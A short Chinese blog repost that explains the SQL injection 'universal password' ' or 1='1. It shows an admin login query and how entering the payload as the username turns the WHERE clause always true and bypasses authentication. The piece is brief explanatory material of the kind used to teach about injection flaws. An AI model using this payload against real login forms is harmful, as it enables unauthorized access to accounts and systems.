SQL万能密码：' or 1='1 - 走看看

zoukankan html css js c++ java

SQL万能密码：' or 1='1

select name,pass from tbAdmin where name='admin' and pass='123456'

输入用户名：' or 1='1

SQL变成下面这个样子：

select name,pass from tbAdmin where name='' or 1='1' and pass='123456'

1='1' 永远为真，所以就验证通过了。。。

来源:

https://blog.csdn.net/friendan/article/details/52215980

查看全文

相关阅读:
Centos7 安装MySQL 5.7 (通用二进制包)
test
test
Windows Live Writer离线写CSDN博客
 Windows Live Writer离线写CSDN博客
 Oracle单引号双重角色——字符串引用与转义
 Oracle单引号双重角色——字符串引用与转义
 Kettle实现数据库迁移
 Kettle实现数据库迁移
 kettle实现数据库迁移----多表复制向导

原文地址：https://www.cnblogs.com/kaibindirver/p/9412042.html

Copyright © 2011-2022 走看看